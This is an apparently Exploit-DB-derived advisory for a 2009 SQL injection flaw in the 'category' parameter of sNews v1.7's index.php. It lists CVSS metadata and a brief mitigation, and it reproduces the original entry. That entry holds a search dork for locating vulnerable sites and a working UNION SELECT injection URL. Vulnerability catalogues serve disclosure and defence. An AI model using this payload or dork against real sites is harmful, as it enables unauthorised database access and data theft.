sNews v1.7 (index.php?category) SQL Injection Vulnerability

vendor:

sNews

by:

CoBRa_21

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: sNews

Affected Version From: 1.7

Affected Version To: 1.7

Patch Exists: NO

Related CWE: N/A

CPE: a:snews:snews:1.7

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

sNews v1.7 (index.php?category) SQL Injection Vulnerability

sNews v1.7 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'category' parameter in the 'index.php' script. This can be exploited to gain access to the database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input and escape special characters.

Source

Exploit-DB raw data:

########################################################################################

sNews v1.7 (index.php?category) SQL Injection Vulnerability

########################################################################################

Author : CoBRa_21

Author Web Page : http://www.ipbul.org

Dork: "Powered by sNews"

########################################################################################
 
Sql Injection:

http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8

########################################################################################
Thanks http://e-banka.org & http://www.cyber-warrior.org
########################################################################################